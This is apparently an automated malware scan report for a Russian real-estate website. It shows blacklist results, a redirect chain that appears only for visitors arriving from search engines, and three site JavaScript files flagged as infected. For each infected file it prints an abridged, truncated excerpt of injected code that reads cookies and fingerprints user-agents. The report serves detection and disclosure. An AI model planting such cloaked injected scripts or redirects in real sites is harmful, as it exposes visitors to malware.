Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=homes2own.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://homes2own.ru/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
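Malicious/Suspicious Redirects
The requests below carry a search-engine Referer header. The same home page URL is listed under "Scanned pages/files" with a 200 OK response, so the redirect appears to depend on how the visitor arrives and may not reproduce on a direct visit.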
Request | Server response | Status |
URL: http://homes2own.ru/ (request simulating a visitor arriving from a search engine) GET / HTTP/1.1 Host: homes2own.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 13 Oct 2014 09:22:37 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.17-pl0-gentoo | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (request simulating a visitor arriving from a search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 13 Oct 2014 09:22:37 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.33 | malicious |
Scanned pages/files
Request | Server response | Status |
http://homes2own.ru/ | 200 OK Content-Length: 44039 Content-Type: text/html | clean |
http://homes2own.ru/media/plg_jblibrary/jquery/jquery-1.5.2.min.js | 200 OK Content-Length: 1124 Content-Type: application/x-javascript | clean |
http://homes2own.ru/plugins/system/jat3/base-themes/default/js/core.js | 200 OK Content-Length: 6877 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The excerpt is abridged: it breaks off mid-token at navigator.userAgen and resumes with later code from the same file (the gap is marked [...] below). The same opening snippet is reported for all three files flagged malicious on this page; its visible part reads a cookie and appears to match the browser's user-agent string against a list of platform and crawler names. function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen [...] el = $(el); if (!el || !el.getChildren() || !el.getChildren().length) return; el.getChildren ()[0].addClass ('first-item'); el.getChildren ()[el.getChildren ().length-1].addClass ('last-item'); } function $$_ (els) { if ($type(els)=='string') return $$(els); var els_ = []; els.each (function (el){ el = $(el); if (el) els_.push (el); }); return els_; };;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://homes2own.ru/plugins/system/jat3/base-themes/default/js/menu/mega.js | 200 OK Content-Length: 15603 Content-Type: application/x-javascript | clean |
http://homes2own.ru/media/system/js/caption.js | 200 OK Content-Length: 3118 Content-Type: application/x-javascript | clean |
http://homes2own.ru/modules/mod_coinslider/js/coin-slider.js | 200 OK Content-Length: 12814 Content-Type: application/x-javascript | clean |
http://homes2own.ru/components/com_ezrealty/library/slimbox/js/slimbox.js | 200 OK Content-Length: 8726 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The excerpt is abridged: it breaks off mid-token at navigator.userAgen and resumes with later code from the same file (the gap is marked [...] below). function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen [...] { if (obj.addEventListener) { obj.addEventListener(evType, fn, false); return (true); } else if (obj.attachEvent) { var r = obj.attachEvent("on"+evType, fn); return (r); } else return (false); } loadEvent(window, "load", Lightbox.init.bind(Lightbox)); } else { window.addEvent("domready", Lightbox.init.bind(Lightbox)); } ;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://homes2own.ru/includes/js/overlib_mini.js | 200 OK Content-Length: 37985 Content-Type: application/x-javascript | clean |
http://homes2own.ru/includes/js/joomla.javascript.js | 200 OK Content-Length: 16560 Content-Type: application/x-javascript | malicious |
Malicious code, confirmed by antivirus engines (see below). The excerpt is abridged: it breaks off mid-token at navigator.userAgen and resumes with later code from the same file (the gap is marked [...] below). function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function c(e,h,j){var g=(e+"").toLowerCase();var i=(h+"").toLowerCase();var f=0;if((f=g.indexOf(i,j))!==-1){return f}return false}function b(){var e=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"];var g=false;for(var f in e){if(c(navigator.userAgen [...] } if (pressbutton == 'go2menu') { form.menu.value = menu; submitform( pressbutton ); return; } if (pressbutton == 'go2menuitem') { form.menu.value = menu; form.menuid.value = id; submitform( pressbutton ); return; } } function isEmail( text ) { var pattern = "^[\\w-_\.]*[\\w-_\.]\@[\\w]\.+[\\w]+[\\w]$"; var regex = new RegExp( pattern ); return regex.test( text ); };;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://homes2own.ru/templates/jgroup/js/jquery.tipsy.js | 200 OK Content-Length: 5526 Content-Type: application/x-javascript | clean |
http://homes2own.ru//modules/mod_ezrealty_slideshow/js/image-slideshow.js/ | 404 Not Found Content-Length: 1106 Content-Type: text/html | clean |
http://homes2own.ru/test404page.js | 404 Not Found Content-Length: 1106 Content-Type: text/html | clean |